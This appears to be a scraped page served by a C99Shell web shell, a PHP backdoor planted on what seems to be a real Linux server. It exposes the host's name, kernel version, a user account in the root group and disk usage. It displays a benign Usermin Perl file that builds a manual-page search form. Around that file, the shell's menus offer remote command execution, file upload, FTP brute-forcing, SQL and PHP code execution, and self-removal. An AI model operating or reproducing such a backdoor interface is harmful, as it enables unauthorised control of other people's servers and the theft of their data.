!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/usermin/man/   drwxr-xr-x
Free 25.01 GB of 117.98 GB (21.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.cgi (2.11 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# index.cgi
# Display the manual pages search form

require './man-lib.pl';
&ui_print_header(undef, $text{'index_title'}, "", "intro", $module_info{'usermin'} ? 0 : 1, 1);

# build list of available search options
@search = ( "man", "help" );
foreach $d (split(/\s+/, $config{'doc_dir'})) {
    if (-d $d) {
        push(@search, "doc");
        last;
        }
    }
foreach $h (split(/\s+/, $config{'howto_dir'})) {
    if (-d $h) {
        push(@search, "howto");
        last;
        }
    }
if (-d $config{'kde_dir'}) {
    push(@search, "kde");
    }
if (-d $config{'kernel_dir'}) {
    push(@search, "kernel");
    }
if ($perl_doc) {
    push(@search, "perl");
    }
if (-d $config{'custom_dir'}) {
        push(@search, "custom");
        }
push(@search, "google");

# display the search form
print &ui_form_start("search.cgi");
print &ui_table_start($text{'index_header'}, undef, 2);

# Search box and boolean mode
print &ui_table_row($text{'index_for'},
    &ui_textbox("for", undef, 50)."<br>".
    &ui_radio("and", 1, [ [ 1, $text{'index_and'} ],
                  [ 0, $text{'index_or'} ] ]));

# Exact match
print &ui_table_row($text{'index_type'},
    &ui_radio("exact", 1, [ [ 1, $text{'index_name'} ],
                 [ 0, $text{'index_data'} ] ]));

# Sections to search
$sects = "";
foreach $s (@search) {
    $txt = $text{"index_${s}"};
    $txt = $config{'custom_desc'}
        if ($s eq "custom" && $config{'custom_desc'});
    $sects .= &ui_checkbox("section", $s, $txt, $s eq 'man')."<br>\n";
    }
print &ui_table_row($text{'index_where'}, $sects);

print &ui_table_end();
print &ui_form_end([ [ undef, $text{'index_search'} ] ]);

# Form to control search from other modules
if (!$module_info{'usermin'} && $access{'allow'}) {
    @check = $config{'check'} ? split(/\s+/, $config{'check'}) : @search;
    print &ui_hr();
    print &ui_form_start("save_check.cgi");
    print &ui_hidden("count", scalar(@search));
    print "<b>$text{'index_others'}</b><br>\n";
    @grid = ( );
    foreach $s (@search) {
        push(@grid, &ui_checkbox("check", $s, $text{"index_other_${s}"},
                         &indexof($s, @check) >= 0));
        }
    print &ui_grid_table(\@grid, 3);
    print &ui_form_end([ [ undef, $text{'save'} ] ]);
    }

&ui_print_footer("/", $text{'index'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--